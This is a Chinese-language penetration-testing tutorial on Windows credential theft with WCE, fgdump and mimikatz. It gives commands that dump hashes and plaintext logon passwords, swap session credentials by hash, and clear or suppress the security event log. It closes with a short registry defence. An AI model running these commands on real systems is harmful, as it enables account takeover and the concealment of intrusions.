Kali滲透測試之提權2——WCE、fgdump、mimikatz

一、WINDOWS身份認證過程

•     在登入視窗輸入賬号和密碼後，winlogon.exe會将輸入的密碼進行lmhash和nthash加密；
•     然後将加密後的密碼與SAM賬戶資料庫進行比對，如果比對比對，則成功登入作業系統（本地登入）；
•     如果網絡中的一台主機嘗試遠端登入另一台主機，登入的賬号和密碼也是通過本地計算機将輸入的密碼進行lmhash和nthash計算，然後将加密後的密文通過網絡傳輸到目标主機；
•    雖然輸入是明文密碼，但是不論是本地登入還是遠端登入作業系統，密碼都是以密文的形式進行傳輸，且對hash進行逆向計算，所得到的結果是不唯一的，是以相對安全。當然也可以用hash碰撞的方式進行爆破。

注：如果是本地登入，身份驗證伺服器端會有NTLM安全包接收請求，對它進行處理。 在登陸的目标服務系統後，有一個wdigest安全包，直接從記憶體總讀取目前使用者資訊，在本地緩存一個明文密碼，當登出登陸後，該賬戶資訊會被删除；如果一直處在登入狀态，預設情況下作業系統會一直将這個明文密碼儲存在記憶體中。

二、WCE工具

 WCE：Windows Credential Editor，Windows身份驗證編輯器。

• WCE是一款功能強大的windows平台内網滲透的工具，使用WCE必須具有管理者的權限；
• 它內建在kali的工具包的windows程式，可以共享給Windows XP；
• 它可以列舉登陸會話，并且可以添加、改變和删除相關憑據（例如：LM/NT hashes）。這些功能在内網滲透中能夠被利用，例如，在windows平台上執行繞過hash或者從記憶體中擷取NT/LM hashes（也可以從互動式登陸、服務、遠端桌面連接配接中擷取）以用于進一步的攻擊。可以檢視系統目前登陸使用者的登陸密碼的密文形式和明文形式。

1、将wce-universal.exe工具拷貝到Windows XP上

2、檢視Windows XP目前系統中的賬戶資訊

3、wce-universal.exe -h                 #檢視wce-universal.exe的幫助資訊

4、wce-universal.exe -l             #檢視目前登入的賬戶和加密的密碼，其中，計算機名也會被當做使用者來處理；

5、wce-universal.exe -lv

• 檢視登入狀态使用者的詳細資訊，包括LUID，賬戶和加密後的密碼等；
• 檢視資訊時，首先嘗試安全模式，直接從記憶體中讀取資訊，讀取失敗後，會嘗試注入模式（可能對系統造成損害）

6、wce-universal.exe -d 0007C39Ah           #删除一個指定會話；參數：LUID

 7、wce-universal.exe -r             #顯示目前最新登入資訊，5秒重新整理一次

8、wce-universal.exe -g 123.com             #對指定的内容進行hash計算

9、wce-universal.exe -w                             #以明文形式讀取密碼

10、修改使用者的登入會話，将cqq使用者的登入會話修改成另外的一個使用者chengqianqian；

wce-universal.exe -i 00062E85 -s chengqianqian:CHENGQIA-1275B1:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

防禦WCE攻擊

系統通過Digest Authentication Package維護明文密碼，預設自啟動，可在系統資料庫（regedit）中關閉預設啟動。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Package

可以看到在系統資料庫中關閉維護明文密碼之後，再次運作wce-universal.exe -w，不能擷取任何的資訊，并且系統會自動重新開機；

三、fgdump工具

fgdump是內建在Kali上的Windows工具，可以下載下傳到Windows XP上使用

輕按兩下fgdump,可以得到如下三個檔案，其中一個包括賬戶和加密的密碼檔案；

擷取到加密的密碼後，可以通過Kali內建的工具進行hash碰撞得到密碼。

四、mimikatz工具

Mimikatz是Kali上內建的Windows工具，存放路徑：usr/share/mimikatz。将該工具拷貝到Windows XP上。

在cmd視窗輸入指令 ' mimikatz.exe '，進入mimikatz的工作界面。

1、::           #檢視幫助資訊

2、privilege::debug        #提升權限

3、sekurlsa::logonPasswords          #檢視目前登入的賬戶和明文密碼

process子產品

4、process::             #檢視可以執行的子子產品

5、process::list             #檢視程序清單

6、process::start calc       #開啟一個計算機程序

lsadump子產品

7、lsadump::          #檢視lsadump的幫助資訊

8、lsadump::sam      #從SAM資料庫中讀取賬号密碼，在XP中不成功，但在WIN7、win8中可能成功

event子產品

9、event::             #檢視event子產品的幫助資訊

10、event::clear        #清除作業系統的安全日志

11、event::drop          #不再産生新的日志

misc子產品

12、misc::                        #檢視misc子產品的幫助資訊

13、misc::cmd                       #新啟動一個cmd

token子產品

14、token::              #檢視token子產品的幫助資訊

15、token::whoami